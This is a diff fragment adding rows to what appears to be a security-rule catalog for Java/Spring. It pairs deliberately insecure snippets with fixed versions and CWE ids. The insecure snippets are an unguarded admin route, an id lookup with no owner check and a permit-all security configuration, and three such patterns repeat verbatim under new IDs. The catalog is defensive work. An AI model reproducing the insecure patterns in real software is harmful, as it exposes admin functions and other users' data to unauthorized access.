+| IFJ-040 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-041 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-042 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-043 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-044 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-045 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-046 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-047 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |
+| IFJ-048 | Java/Spring: security config exists but not bound to endpoint chain (Logic: strong) | `http.authorizeHttpRequests(c -> c.anyRequest().permitAll())` | `http.authorizeHttpRequests(c -> c.requestMatchers('/admin/**').authenticated())` | Java/Spring | CWE-863 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Declared security policy does not effectively protect controller paths. |
+| IFJ-049 | Java/Spring: missing global guard on controller route (Logic: strong) | `@GetMapping('/admin') public String admin(){ return svc.all(); }` | `@PreAuthorize('hasRole(''ADMIN'')') @GetMapping('/admin') public String admin(){ return svc.all(); }` | Java/Spring | CWE-285 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Controller route is reachable without central authorization enforcement. |
+| IFJ-050 | Java/Spring: controller data access bypasses security context (Logic: strong) | `repo.findById(id)` | `repo.findByIdAndOwner(id, principalId)` | Java/Spring | CWE-639 | Autofix: bind controller access to global guard/interceptor and owner-scoped repository methods. | Object fetched by id without principal binding enables BOLA/IDOR. |